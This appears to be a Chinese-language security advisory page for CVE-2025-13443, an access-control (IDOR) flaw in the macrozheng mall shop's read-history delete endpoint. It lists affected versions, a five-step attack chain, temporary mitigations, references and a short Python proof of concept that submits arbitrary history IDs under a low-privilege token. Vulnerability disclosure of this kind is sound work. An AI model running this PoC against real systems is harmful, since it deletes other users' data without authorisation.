CVE-2025-13443 CVSS 5.4 中危

CVE-2025-13443 macrozheng mall权限控制不当漏洞

披露日期: 2025-11-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-13443

漏洞类型

权限控制不当

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

macrozheng mall

漏洞概述

CVE-2025-13443是macrozheng mall商城系统中的一个权限控制不当漏洞。该漏洞存在于会员模块的阅读历史删除功能中，攻击者可以通过操纵member/readHistory/delete接口的ids参数，绕过正常的权限验证机制，删除任意用户的阅读历史记录。由于该漏洞允许低权限用户执行高权限操作，远程攻击者无需用户交互即可利用此漏洞，对系统的机密性和完整性造成一定影响。漏洞影响版本为macrozheng mall 1.0.3及以下版本，目前该漏洞的利用代码已公开，厂商尚未发布官方修复版本。

技术细节

该漏洞属于OWASP Top 10中的Broken Access Control（失效的访问控制）类别。在macrozheng mall的member/readHistory/delete接口中，服务器端未能正确验证当前用户是否拥有删除指定ids对应记录的权限。攻击者可以通过修改HTTP请求中的ids参数，尝试删除其他用户的阅读历史数据。由于缺少对资源所有权的校验，攻击者可以利用IDOR（不安全的直接对象引用）漏洞实现未授权访问。攻击者首先需要拥有一个有效的低权限账户（如普通会员账号），然后构造恶意请求发送到目标服务器，即可触发漏洞。漏洞影响mall项目1.0.3及更早版本。

攻击链分析

STEP 1

步骤1

攻击者注册并获取macrozheng mall系统的低权限会员账户

STEP 2

步骤2

攻击者访问会员模块的阅读历史功能，观察正常的删除请求格式

STEP 3

步骤3

攻击者拦截删除请求，修改ids参数中的历史记录ID为目标用户的历史记录ID

STEP 4

步骤4

攻击者发送修改后的恶意请求到/member/readHistory/delete接口

STEP 5

步骤5

服务器端由于缺少所有权校验，直接执行删除操作，导致任意用户历史记录被删除

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-13443 PoC - macrozheng mall Improper Access Control
# Target: /member/readHistory/delete endpoint

target_url = "http://target-server/api/member/readHistory/delete"

# Authenticated session with low-privilege user
headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <low_privilege_token>"
}

# Payload to delete arbitrary read history by manipulating ids parameter
payload = {
    "ids": [1, 2, 3, 999, 1000]  # Attempt to delete history IDs without ownership check
}

try:
    response = requests.post(target_url, headers=headers, json=payload, timeout=10)
    
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
    
    # Check if the vulnerability is exploitable
    if response.status_code == 200 and "success" in response.text.lower():
        print("[+] Vulnerability confirmed - IDs can be deleted without ownership verification")
    else:
        print("[-] Request failed or access denied")
except requests.exceptions.RequestException as e:
    print(f"[-] Error: {e}")

影响范围

macrozheng mall <= 1.0.3

防御指南

临时缓解措施

在官方修复版本发布前，可通过以下措施临时缓解：1) 限制/member/readHistory/delete接口的访问频率；2) 在应用层添加请求来源验证；3) 启用审计日志记录所有删除操作；4) 对API端点实施额外的身份验证机制；5) 使用Web应用防火墙（WAF）监控异常请求模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13443
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13443
3 Details https://www.cvedetails.com/cve/CVE-2025-13443/
4 VulDB https://vuldb.com/cve/CVE-2025-13443
5 Link https://github.com/Hwwg/cve/issues/15
6 Link https://vuldb.com/?ctiid.333016
7 Link https://vuldb.com/?id.333016
8 Link https://vuldb.com/?submit.690892
9 Link https://github.com/Hwwg/cve/issues/15

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表